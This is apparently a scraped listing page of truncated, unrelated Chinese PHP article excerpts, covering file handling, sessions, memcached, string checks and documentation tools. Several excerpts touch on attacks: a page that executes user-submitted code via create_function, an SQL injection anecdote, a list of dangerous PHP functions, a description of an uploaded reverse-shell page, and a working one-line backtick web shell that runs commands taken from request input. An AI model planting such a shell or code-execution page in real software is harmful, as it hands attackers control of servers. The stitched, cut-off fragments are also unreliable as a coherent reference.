PHP

有時前台頁面要允許動態增加/刪除某項屬性的多個值，比如向書架中添加書本，要可以動態增加或者刪除書本。前台頁面的表單中會有多個input元素，如下：複製代碼 代碼如下:<form action="a.php"><input type="text" name="books[]"/><input type="text" name="books[]"/><input type="text" name="books[]"/><input

建立檔案我們用到函數fopen ( string filename, string mode )參數filename為建立檔案名稱參數mode為以什麼方式開啟檔案filename其中mode可能值列表：mode 說明‘r' 唯讀方式開啟，將檔案指標指向檔案頭。‘r+' 讀寫方式開啟，將檔案指標指向檔案頭。‘w' 寫入方式開啟，將檔案指標指向檔案頭並將檔案大小截為零。如果檔案不存在則嘗試建立之。‘w+' 讀寫方式開啟，將檔案指標指向檔案頭並將檔案大小截為零。如果檔案不存在則嘗試建立之。‘a'

前兩天朋友的一個網站上有人利用php注入提交flash遊戲分數，後來找原因才發現是有一位參數沒有做數字判斷導致。本來儲存遊戲分數是 game.php?ac=save&fgid=1這個形式來實現，在php網頁裡面fgid直接調用，沒有做任何的過濾。很多人利用在fgid=1後面加一個字母(fgid=1a)，來實現一些非法操作。假如  gamlist table 裡面有一個遊戲  fgid為102select gname from gamelist where fgid='

把images目錄設定成不充許http訪問（把圖片目錄的：讀取、瀏覽目錄 兩個許可權去掉）。用一個PHP檔案，直接用file函數讀取這個圖片。在這個PHP檔案裡進行許可權控制。apache環境中，在你的圖片目錄中加上下面這個檔案即可。檔案名稱 .htaccess檔案內容如下複製代碼 代碼如下:# options the .htaccess files in directories can override.# Edit apache/conf/httpd.conf to

本文執行個體講述了PHP實現動態執行代碼的方法。分享給大家供大家參考，具體如下：這裡介紹的PHP動態執行，即在頁面上直接輸入代碼，點擊執行，返回執行結果方法很簡單，主要使用了：$newfunc = create_function('', $code); 函數來實現。代碼如下：<?php$code = 'return "no code!";';if (isset($_POST['code']) && $_POST['code'] != ''){ $code =

本文執行個體講述了PHP動態產生指定大小隨機圖片的方法。分享給大家供大家參考，具體如下：<?php$image_width = 100;$image_height = 100;$image_str = '';if (isset($_GET['w'])){ $image_width = intval($_GET['w']);}if (isset($_GET['h'])){ $image_height = intval($_GET['h']);}if

本文執行個體講述了PHP簡單判斷字串是否包含另一個字串的方法。分享給大家供大家參考，具體如下：在使用PHP判斷某字串中是否包含一個簡單的子字串的時候，我們通常會用到strpos()或者stristr()這兩個函數，可是偏偏如果這個字串的位置如果是在索引0位置，也就是說在要匹配的字串的最開始，則會出問題。當然我們還是有解決的方法的，這裡就有一個笨辦法，但是比較好用，無論中英文，標點符號都適用。代碼如下:function checkStr($str,$target){ $tmpArr =

本文執行個體為大家分享了9種php擷取檔案尾碼的方法，供大家參考，具體內容如下<?php/** * Created by PhpStorm. * User: liuft * Date: 2016/3/7 * Time: 15:46 */ //第一種// function get_extension($file)// {// $file = explode('.', $file);// return end($file);// }//第二種 // function

複製代碼 代碼如下:function validation_filter_id_card($id_card) { if(strlen($id_card) == 18) { return idcard_checksum18($id_card); } elseif((strlen($id_card) == 15)) { $id_card = idcard_15to18($id_card); return idcard_checksum18($id_card); } else { return

當看到錯誤提示 syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING 這個提示，是提示變數使用的問題。 而我出現的是，語句中使用了數組，導致失敗。下面看看失敗的代碼； <?php echo "我是數組，$n['x']"; ?> 這樣即時雙引號是可以解析變數的，但是素組這樣的，寫法是沒辦法解析。修改成下面就可以了！ <?php

讓我們算一算有多少種方法 處理諸如 PHP 之類的現代程式設計語言的樂趣之一就是有大量的選項可用。PHP 可以輕鬆地贏得 Perl 的座右銘“There's more than one way to do it”（並非只有一種方法可做這件事），尤其是在檔案處理上。但是在這麼多可用的選項中，哪一種是完成作業的最佳工具？當然，實際答案取決於解析檔案的目標，因此值得花時間探究所有選項。 回頁首 傳統的 fopen 方法 fopen 方法可能是以前的 C 和 C++

一個已知管用的方法是，使用session_set_save_handler，接管所有的session管理工作，一般是把session資訊儲存到資料庫，這樣可以通過SQL語句來刪除所有到期的session，精確地控制session的有效期間。這也是基於PHP的大型網站常用的方法。但是，一般的小型網站，似乎沒有必要這麼勞師動眾。 但是一般的Session的生命期有限，如果使用者關閉了瀏覽器，就不能儲存Session的變數了！那麼怎麼樣可以實現Session的永久生命期呢？

關於比較請看http://code.google.com/p/memcached/wiki/PHPClientComparison。推薦使用新的memcached，安裝方法基本同下面，只是需要先安裝libmemcached，如果還需要啟用壓縮，還需要安裝zlib。用 PECL 編譯共用 PECL 擴充庫 $ pecl install extname 然後就是一長串的自動執行,最後程式告訴你You should add “extension=memcache.so” to

後來又在手冊上找到了is_utf8函數，這樣，再結合iconv函數，我的問題就解決了。下面帖出這個函數： 複製代碼 代碼如下:function is_utf8($string) { return preg_match('%^(?: [\x09\x0A\x0D\x20-\x7E] # ASCII | [\xC2-\xDF][\x80-\xBF] # non-overlong 2-byte | \xE0[\xA0-\xBF][\x80-\xBF] # excluding overlongs | [\

複製代碼 代碼如下:<?php /** * @Filename :page.sql.class.php * @CreatTime :2009-01-06 * @Descrition :此類為SQL語句處理類。 * @UpdateTime-1 :null * @Version :jswweb1.0.0 * @Author :fkedwgwy * @Dome : $sql//SQL語句 $allcount//總記錄數 $pagesize//頁面顯示記錄條數 $page//當前頁 $sqlc=

可在編譯時間使用 –disable-cli。一旦編譯產生 CLI 模式的 PHP，則可能會被入侵者 利用該程式建立一個 WEB Shell 後門進程或通過 PHP 執行任意代碼！ phpinfo() 功能描述：輸出 PHP 環境資訊以及相關的模組、WEB 環境等資訊。 危險等級：中 passthru() 功能描述：允許執行一個外部程式並回顯輸出，類似於 exec()。 危險等級：高 exec() 功能描述：允許執行一個外部程式（如 UNIX Shell 或 CMD 命令等）。 危險等級：高

非常無 奈，沒想 到什麼好的辦法，後來靈光一閃。放一個php頁面，裡面 可以直接彈回來shell，何況在console下面操作比webshell方便的多，也不會出現逾時之類的情況。 因為我不怎麼懂php，於是就找了猥瑣 的諾諾和小雨修改了一下代碼，反彈代碼是從phpspy2008裡面提取的，但是不能直接用，需要修改成一個單獨的php檔案。上傳之後，本地監聽一個端 口，在代碼裡設定好反彈IP和連接埠，然後直接存取，就會彈回來一個shell。

複製代碼 代碼如下:<?php /*一個新型的php一句話cmdshell(非一句話木馬) //原理:php運行時如果遇見字元``(鍵盤上~符號的下檔鍵)總會嘗試著執行``裡麵包含的命令，並返回命令執行的結果(string類型)； //局限性:特徵碼比較明顯，``符號在php中很少用到，殺毒軟體很容易以此為特徵碼掃描到並警報；``裡面不能執行php代碼； //write by skyfire */ echo `$_REQUEST[id]`; ?>

我們來大致瞭解一下error_log()函數。我們看下手冊的解釋：error_log(PHP 3, PHP 4, PHP 5)bool error_log ( string message [, int message_type [, string destination [, string extra_headers]]]

1. 什麼是phpDocumentor ? PHPDocumentor 是一個用PHP寫的工具，對於有規範注釋的php程式，它能夠快速產生具有相互參照,索引等功能的API文檔。老的版本是 phpdoc，從1.3.0開始，更名為phpDocumentor，新的版本加上了對php5文法的支援，同時，可以通過在用戶端瀏覽器上操作產生文檔，文檔可以轉換為PDF,HTML,CHM幾種形式，非常的方便。